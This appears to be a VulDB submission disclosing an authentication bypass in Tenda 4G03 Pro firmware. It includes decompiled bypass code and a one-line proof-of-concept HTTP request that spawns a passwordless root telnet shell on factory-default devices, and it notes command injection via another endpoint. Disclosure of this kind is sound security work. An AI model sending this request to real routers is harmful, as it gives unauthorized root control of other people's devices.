| Title | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 Authentication Bypass Issues |
|---|
| Description | Tenda 4G03 Pro V1.0 /bin/httpd authentication bypass for sensitive endpoints
The R7WebsSecurityHandler function (FUN_00021a54) in /usr/sbin/httpd
of Tenda 4G03 Pro V1.0 firmware V04.03.01.53 explicitly skips
authentication for three sensitive management endpoints when the
admin password is unset (factory default). Sending GET
/goform/telnet starts a persistent root telnet daemon on TCP/23.
The /goform/ate endpoint enables OS command injection. The
/goform/zerotier endpoint exposes VPN tunnel configuration. All
three are accessible with zero credentials on a factory-default device.
POC:
Auth bypass code (FUN_00021a54):
if (strncmp(url,"/goform/telnet",0xe)==0 &&
DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/ate",0xb)==0 &&
DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/zerotier",0x10)==0 &&
DAT_00050f14=='\0') goto pass_through;
PoC — spawn root telnet shell:
GET /goform/telnet HTTP/1.1
Host: 192.168.0.1
Result: telnetd starts on TCP/23, login as root with no password |
|---|
| User | CoreNode (UID 96566) |
|---|
| Submission | 03/18/2026 03:16 (19 days ago) |
|---|
| Moderation | 04/04/2026 08:20 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 355279 [Tenda 4G03 Pro up to 1.0/1.1/04.03.01.53/192.168.0.1 /bin/httpd access control] |
|---|
| Points | 17 |
|---|